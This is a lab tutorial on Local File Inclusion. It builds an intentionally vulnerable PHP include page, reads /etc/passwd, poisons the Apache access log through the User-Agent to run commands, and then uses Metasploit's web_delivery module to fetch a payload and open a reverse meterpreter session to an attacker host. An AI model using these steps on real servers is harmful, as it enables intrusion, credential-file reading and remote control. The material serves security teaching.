In this article we are demonstrating how a PHP file with include
function can lead to LFI log injection attack in any web server. Please read
our previous article “Beginner Guide to File Inclusion Attack (LFI/RFI)”
and “Configure Web Server for Penetration Testing (Beginner
Guide)” that will help you
in configuration of own web server as well as more about LFI vulnerability.
Attacker: Kali Linux
Target: ubuntu
Create a PHP file which will allow the user to include
a file through file parameter. Hence using file parameter we can execute a file
that contains malicious code to make unauthorized access is target PC. Download
File from Here
Now I had saved given below PHP code inside a text
file as lfi.php and saved on desktop.
Now login with user as “root” and create a folder
“lfi” inside /var/www/html
cd /var/www/html
mkdir lfi
Move lfi.php file from
desktop to /var/www/html using given below command.
mv
/home/raj/Desktop/lfi.php .
Since we had added a php file with include function inside
/var/www/html which allow to read the content of another file through it and can
lead to LFI attack. Let’s demonstrate it by exploring following URL to read
password files:
Localhost/lfi/lfi.php?file=/etc/passwd
From given image you can observe that above URL has dumped
following result shown below.
Now I will try to open Apache access.log file through
lfi.php on browser therefore give read permission to apache2 and then include
the access.log file.
Now to include the acess.log file as file parameter and
give following URL inside browser.
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log
From given image you can see it is showing created
apache logs in browser. Now turn on burp suite to capture the
request of same web page.
Here you will get intercepted data where we need to
inject our cmd comment inside user-agent by replace highlighted data.
Add cmd comment inside
user_Agent and send the request with GET parameter /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps as
shown in the below image. Then click on forward.
Here it will dump the log data as well as execute
comment given through cmd. From screenshot you can view both log as well as
process state.
In same manner execute ifconfig
through cmd to verify network interface or can browse following url and view
the result from inside the given screenshot.
192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig
If you found such kind of vulnerability in any web application
then you can use metasploit platform to exploit web server.
This
module quickly fires up a web server that serves a payload. The provided
command will start the specified scripting language interpreter and then
download and execute the payload. The main purpose of this module is to quickly
establish a session on a target machine when the attacker has to manually type
in the command himself, e.g. Command Injection, RDP Session, Local Access or
maybe Remote Command Exec. This attack vector does not write to disk so it is
less likely to trigger AV solutions and will allow privilege escalations
supplied by Meterpreter. When using either of the PSH targets, ensure the
payload architecture matches the target computer or use SYSWOW64 powershell.exe
to execute x86 payloads on x64 machines.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target
1
msf exploit (web_delivery)> set
payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set
lhost 192.168.0.104
msf exploit (web_delivery)>set
srvport 8081
msf exploit (web_delivery)>exploit
Copy the highlighted
text shown in below window
Paste the above copied
malicious code inside URL as shown in given image and execute it as command.
When above code gets execute you will get meterpreter session 1.
msf exploit (web_delivery)>session
–I 1
meterpreter> sysinfo
0 comments:
Post a Comment